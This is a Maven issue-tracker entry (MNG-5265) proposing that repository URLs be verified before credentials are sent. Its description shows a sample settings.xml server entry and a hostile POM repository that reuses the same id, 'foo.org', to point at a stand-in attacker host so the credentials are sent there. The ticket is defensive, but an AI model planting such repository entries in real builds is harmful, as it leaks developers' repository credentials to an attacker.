Maven
  1. Maven
  2. MNG-5265

enforce repository url verification for passing authz

    Details

    • Type: Improvement Improvement
    • Status: Open Open
    • Priority: Major Major
    • Resolution: Unresolved
    • Affects Version/s: 2.0.10, 2.2.1, 3.0.2, 3.0.3, 3.0.4
    • Component/s: Settings
    • Labels:
      None
    • Complexity:
      Intermediate
    • Number of attachments :
      0

      Description

      Related discussion: http://markmail.org/message/7pswshucxc7qwtef

      in your settings you have:

          <server>
            <username>olamy</username>
            <password>reallycomplicatedpassword</password>
            <id>foo.org</id>
          </server>
      

      During dependencies resolution, you get a pom with a repository.

          <repository>
            <id>foo.org</id>
            <url>http://yourpasswordwillbehacked.org/</url>
          </repository>
      

      Idea id in settings must contains the target hostname.

        Activity

        Olivier Lamy made changes -
        Field Original Value New Value
        Fix Version/s 3.0.5 [ 18129 ]
        Jason van Zyl made changes -
        Fix Version/s 3.1.0 [ 18967 ]
        Fix Version/s 3.1.x [ 18129 ]
        Jason van Zyl made changes -
        Fix Version/s 3.1.x [ 18129 ]
        Fix Version/s 3.1.0 [ 18967 ]
        Jason van Zyl made changes -
        Fix Version/s 3.2 [ 15565 ]
        Fix Version/s 3.1.x [ 18129 ]
        Jason van Zyl made changes -
        Fix Version/s 3.2 [ 15565 ]
        Fix Version/s Issues to be reviewed for 4.x [ 19871 ]

          People

          • Assignee:
            Unassigned
            Reporter:
            Olivier Lamy
          • Votes:
            0 Vote for this issue
            Watchers:
            2 Start watching this issue

            Dates

            • Created:
              Updated: